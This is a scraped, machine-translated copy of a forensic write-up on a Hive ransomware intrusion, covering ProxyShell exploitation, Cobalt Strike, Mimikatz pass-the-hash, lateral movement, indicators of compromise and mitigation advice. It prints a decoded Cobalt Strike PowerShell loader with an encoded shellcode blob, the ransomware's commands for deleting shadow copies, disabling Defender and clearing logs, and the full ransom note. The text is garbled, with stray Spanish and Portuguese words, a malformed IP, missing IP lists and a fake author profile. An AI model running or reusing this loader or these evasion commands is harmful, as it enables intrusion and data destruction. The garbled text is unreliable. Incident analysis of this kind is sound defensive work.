Hive ransomware analysis (2023)

During a recent customer engagement, Varonis' forensics team investigated a ransomware incident. Several device and file servers were compromised and encrypted by a malicious threat group known as Hive.

Hive, which was first observed in June 2021, is an affiliate-based ransomware variant used by cybercriminals to conduct ransomware attacks against healthcare facilities, nonprofits, retailers, energy providers, and other industries. in the whole world. O Hive was projected to be distributed in umRansomware as a Servicemodel that allows affiliates to use it as they see fit.

Hive ransomware analysis (1)

The variant uses common ransomware tactics, techniques, and procedures (TTPs) to compromise victims' devices. When performing live actions, the operator disables anti-malware protections and then extracts sensitive data and encrypts commercial files. Its affiliates use various mechanisms to compromise their victims' networks, including phishing emails with malicious attachments, leaking VPN credentials, and exploiting vulnerabilities in external assets. Furthermore, Hive places a ransom note in plain text that threatens to publish the victim's data on the TOR website 'HiveLeaks' unless the victim complies with the attacker's conditions.

Hive ransomware analysis (2)

observation of the attack

The forensics team observed that the actor achieved its malicious goals and encrypted the environment in less than 72 hours from the initial compromise.

Etapa 1: ProxyShell e WebShell

First, the attacker exploited several Exchange security vulnerabilities called ProxyShell. The attack then placed a malicious backdoor script, called a webshell, in a publicly accessible directory on the Exchange server. These web scripts can execute malicious PowerShell code on the compromised server with SYSTEM privileges.

Stage 2: Cobalt Strike

The PowerShell malware downloaded additional stages from a remote C2 (Command and Control) server associated with the Cobalt Strike framework. Scenarios were not written to the file system, but played in memory.

Stage 3: Mimikatz and Pass-The-Hash

Leveraging SYSTEM permissions, the threat actor created a new sysadmin user named "user" and proceeded to the credential dump stage, invokingMimikatz🇧🇷 By stealing the domain administrator's NTLM hash and without having to crack the password, the operator was able to reuse it through the Pass-The-Hash attack and take control of the domain administrator's account.

Phase 4: Analysis of confidential information

The threat actor performed extensive discovery activities across the entire network. In addition to looking for files that contain "password" in their names, activities observed included scanning the network and collecting IP addresses and device names from networks, followed by RDP to backup servers and other critical assets.

Stage 5: Implementing the ransomware

Ultimately, a custom malware payload called Windows.exe was delivered and executed on multiple devices, leading to extensive encryption and denial of access to files within the organization.

The payload created a plain text ransomware demand note during the encryption phase.

initial access

The initial indicator of compromise was the successful exploitation of Microsoft Exchange through vulnerabilities known as ProxyShell.

Unveiled in August 2021, ProxyShell is a Remote Code Execution (RCE) vulnerability. ProxyShell involves a set of three separate security flaws and allows remote attackers to execute arbitrary code on affected Microsoft Exchange Server installations.

(Video) Hive Ransomware || How to Stay Safe From Hive Ransomware || How Hive Ransomware Works || FBI says

CVE-2021-34473 (base score: 9.8)

Microsoft Exchange Server Remote Code Execution Vulnerability.

CVE-2021-34523 (base score: 9.8)

Microsoft Exchange Server Elevation of Privilege Vulnerability

CVE-2021-31207 (base score: 7.2)

Microsoft Exchange Server Security Feature Bypass Vulnerability

Microsoft released patches for these three vulnerabilities in April and May 2021 as part of its "Patch Tuesday" releases. CVE-2021-34473 and CVE-2021-34523 were patched (KB5001779) in April 2021. CVE-2021-31207 was patched (KB5003435) in May.

During the investigation, we found evidence of specific exploitation of these CVEs (Common Vulnerabilities and Exposures), which allowed the adversary to successfully deploy webshells on the compromised server.

Hive ransomware analysis (3)

According to our analysis, four different IP addresses accessed the malicious files: (EE. UU.)


RELATED ACTIVITY: Cobalt Strike C2 and Log4j Vulnerability Analysis (UE)


(Video) Experts Analyze Conti and Hive Ransomware Gangs' Chats With Their Victims

RELATED ACTIVITY: Cobalt Strike C2 and Log4j Vulnerability Analysis (Netherlands)


RELATED ACTIVITY: Cobalt Strike C2 and Log4j Vulnerability Scan. Associated with Emotet, IcedID and QBot.

91,208,52,149 (Netherlands)


The following malicious files were detected:

Hive ransomware analysis (4)These filenames are made up of random characters that seem to have no meaning. Attackers often use this technique to prevent third parties from finding webshells online by sending HTTP requests to a list of pre-built names that are part of other campaigns.

Hive ransomware analysis (5)

The source code for the defined webshells is taken from a public git repository at

Hive ransomware analysis (6)Execution

Establishing a base on the compromised Exchange Server, the threat actor executed several PowerShell commands designed to download malicious files from the remote C2 server to the victim's computer. Attackers would execute malware using commands such as Invoke-Expression (IEX) or by downloading the file's contents directly into the device's memory and executing it:

Hive ransomware analysis (7)Additionally, attackers executed an additional obfuscated PowerShell script that was part of the Cobalt Strike framework:

(Video) SentinelOne Vs. Hive Ransomware – Mitigation and Rollback

Hive ransomware analysis (8)The Base64 encoded command contains several layers of encoding, but is decoded into the following PowerShell command:

function func_get_proc_address {Param ($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[- 1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices. HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods .GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type {Param ([Parameter(Position = 0, Obligatorio = $True)] [Type[] ] $var_parameters,[Parameter(Position = 1)] [Tipo] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.E mit.As semblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])$var_type_builder.DefineConstructor(' RTSpecialName, HideBySig , Público', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ var_return_type, $ var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIx LcptVXJ6ra yCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDBpbdHcjt/oD/JWHd4sCLmyO98yFY4rSkNpnTutksFjPk1iId3VatKb1qXZnUlBHxy9uRECX2FYx1tCT2QCAktdtYyitbmqWDvjVGRB9bSN2UEZRDmJERk1XGQNuTFlKT09CDBcNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNEwouKSPHnhscH1J2ehVV9xiGIbRbaqS5cqjAmVwq68rbHTbqKwvVPYdIwQX2sCpP4Huf69SBXmMT5Uf78YpcuINAFMaQSn2ghpZ2G7UnqTkvRtIxy6TiOP3eK6FQ1llgA3N8VNacREpvDLUIaZ6/oaEPfm0YlN8JZlys9JSvydexNohj88pn9o2SyWlVIxY8cJLweQz1ZdO2JIzPEnVW4x52BGHMgFqryhE8N1PEyfVnFL/7oUr8aGQvMsusR84zVxpx5+C6a+SP9iBhlQcdopF5Zu0hJsRfacn4nFrojL1nt+/oBQcjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIQGg0VEw0SFRINEREbIzpKg64=')for ($x = 0; $x -lt $código_var.Cuenta; $x++) {$var_code[$x] = $var_code[$x] -bxor 35}Saída de escritura $var_code

The additional "for loop" function adds another layer of obfuscation and XORs the Base64 code with a key of 35. We successfully extracted the C2 destination IP address by mimicking the process, which unsurprisingly turned out to be the same address as found earlier.

Hive ransomware analysis (9)

Converting Base64 to a hexadecimal string and reformatting with a Python script restored the malicious file. The VirusTotal analysis shows 23 out of 52 antivirus detections and attributes the file to the Cobalt Strike framework.

Hive ransomware analysis (10)


With the NT AUTHORITY\SYSTEM privileges provided and to maintain persistence on the compromised server, a newly created account was created, followed by the name "user" and added to the "Remote Desktop Users" and "Administrators" groups. The user was used for multipath access to files related to "passwords", RDP access to backup servers, and more.

access to credentials

The threat actor used Mimikatz, a post-exploitation tool, specifically the SekurLSA "logonPasswords" module, which extracts NTLM passwords and hashes from registered accounts on the system and saves the results to a text file on the system. With the administrator's NTLM hash in hand, the threat actor used the pass-the-hash technique to gain highly privileged access to other assets on the network by launching a new command prompt on the affected system:

Hive ransomware analysis (11)

lateral movement

Leveraging the stolen domain administrator account, the actor made RDP access requests using mstsc.exe following the "/v" parameter to various devices on the network, primarily looking for servers associated with network backups and SQL servers. We strongly believe these actions were taken to confirm the ability to access critical servers prior to the ransomware being deployed.


A popular public network scanning tool called "SoftPerfect" was used to perform scans on domain assets.

(Video) #15 Hive Ransomware: Recent Discoveries & Novel Obfuscation Methods

Hive ransomware analysis (12)Using the tool, the threat actor acquired the list of domain devices and saved the results to a text file named "domains.txt". To find all active hosts, the attacker ran a batch script called "p.bat", which pinged the list of domains and saved the results to a text file called "res.txt".

Hive ransomware analysis (13)

Hive ransomware analysis (14)

The p.bat script and file naming convention correspond to part of the Conti ransomware toolkit, which was provided to the group's affiliates and first leaked on August 21, 2022 andposted on twitter🇧🇷 This indicates that Hive affiliates are adopting other ransomware gang techniques.


Threat actors began their final actions by distributing a file called "windows.exe", which was the ransomware payload written in Golang. The payload performs several operations including shadow copy deletion, disabling security products, cleaning Windows event logs and closing file handles to ensure a smooth encryption process. Below is a brief documentation of the commands executed:

vssadmin.exe delete shadows / todo / silentDelete machine shadow copies to inhibit system recovery
net.exe stop "SamSs" /yStops the Security Accounts Manager to prevent sending alerts to the SIEM system
reg.exe agregue "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fDisable Windows Defender to avoid detection
wevtutil.exe cl securityClear Windows Security Event Logs

The ransomware goes through all available folders encrypting included files and drops a ransom note called "_HOW_TO_DECRYPT.txt" in each folder. Once encryption is completed, it displays the ransom note to inform user about the attack.

Your network has been breached and all data has been encrypted. Personal data, financial reports and important documents are ready to be disclosed. In order to decrypt all data and prevent extracted files from being disclosed to http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/, you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: Password: To access .onion websites, download and install the Tor browser from: (the Tor browser not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key. files Your data cannot be decrypted. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They just won't let you pay. As a result, you will lose everything. - Do not hire a recovery company. They cannot decrypt without the key. They also don't care about your business. They think they are good negotiators, but they are not. They usually fail. So speak for yourself. - Do not reject the purchase. Extracted files will be made publicly available.


Ransomware attacks have grown significantly in recent years and remain the preferred method for threat actors looking to maximize profit. The impact of an attack can be damaging. It can potentially damage an organization's reputation, disrupt regular operations, and cause temporary and possibly permanent loss of sensitive data.

While detecting and responding to these incidents can be challenging, most malicious activity can be prevented with security tools, incident response plans, and patches for known vulnerabilities.


The Varonis Forensics Team recommends the following:

  • CorrectionExchange Server for the latest Exchange Cumulative Update (CU) and Security Update (SU) provided by Microsoft.
  • Enforce the use of complex passwords and require users to change passwords regularly.
  • Use oMicrosoft LAPSsolution to revoke local administrator permissions from domain accounts (the principle of least privilege) and regularly scan and remove inactive user accounts.
  • Block SMBv1and use SMB signing to protect against pass-the-hash attacks.
  • Restrict access to the minimum required for the employee's role.
  • Automatically detect and prevent access control changes that violate your business rules.
  • Train employees on security principles and ensure they receive security training as part of their cybersecurity plans.
  • Establish basic security practices and define rules of behavior that describe how to manage and protect organization and customer information and other vital data.

MITER deployment

1. Initial access

2. Execution

3. Persistence

4. Privilege escalation

5. Defense Evasion

  • Deobfuscate/Decrypt files or information (T1140)
  • Removing the flag on the host (T1070)

6. Access with Credentials

  • Operating system credentials dump (T1003)

7. Discovery

  • Discovery of remote systems (T1018)

8. Lateral movement

9. Command and Control

10. Impact

  • Encrypted data for impact (T1486)


Created user account names

  • "User name"

malicious IPs

advanced port scanner.exe4fdabe571b66ceec3448939bfb3ffcd1763499b37aacd317e7d2f512872f9ed719aacae1
Webshell #1d46104947d8478030e8bcfcc74f2aef7d1ef9f484f10d12345c41d6b9fca8ee0efa29b60
Webshell #22401f681b4722965f82a3d8199a134ed2aee699780f06857bb0fb9c0f73e33d1ac87a385


1. SentinelOne Vs. Hive Ransomware – Protect Mode
2. CISA Alert AA22-321A – #StopRansomware: Hive Ransomware. [CISA Cybersecurity Alerts]
(The CyberWire)
3. Ransomware Group’s Mistake Cost Millions...
4. $240 Million ransom demand?
(Siam Alam)
5. Detecting and Neutralizing Hive Ransomware with ThreatResponder
6. 🔴 Conti Ransomware Gang Analysis
(Gerald Auger, PhD - Simply Cyber)
Top Articles
Latest Posts
Article information

Author: Gov. Deandrea McKenzie

Last Updated: 03/16/2023

Views: 6316

Rating: 4.6 / 5 (66 voted)

Reviews: 89% of readers found this page helpful

Author information

Name: Gov. Deandrea McKenzie

Birthday: 2001-01-17

Address: Suite 769 2454 Marsha Coves, Debbieton, MS 95002

Phone: +813077629322

Job: Real-Estate Executive

Hobby: Archery, Metal detecting, Kitesurfing, Genealogy, Kitesurfing, Calligraphy, Roller skating

Introduction: My name is Gov. Deandrea McKenzie, I am a spotless, clean, glamorous, sparkling, adventurous, nice, brainy person who loves writing and wants to share my knowledge and understanding with you.